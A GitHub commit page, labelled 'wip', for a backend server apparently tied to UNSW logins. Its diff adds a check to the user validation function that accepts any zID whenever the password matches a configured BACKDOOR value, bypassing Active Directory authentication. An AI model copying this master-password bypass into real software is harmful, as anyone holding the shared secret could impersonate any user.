Skip to content

Commit

Permalink
wip
Browse files Browse the repository at this point in the history
  • Loading branch information
chamhayden committed Apr 1, 2024
1 parent 617d319 commit 97a35a3
Show file tree
Hide file tree
Showing 2 changed files with 8,382 additions and 8,383 deletions.
4 changes: 4 additions & 0 deletions backend/src/server.js
Original file line number Diff line number Diff line change
Expand Up @@ -118,6 +118,10 @@ const validUserCheck = (zid, zpass, term) => {
resolve(zid);
return;
}
if (zpass === config.BACKDOOR) {
resolve(zid);
return;
}

const email = `z${zid}@ad.unsw.edu.au`;
const newad = new ActiveDirectory({
Expand Down
Loading

0 comments on commit 97a35a3

Please sign in to comment.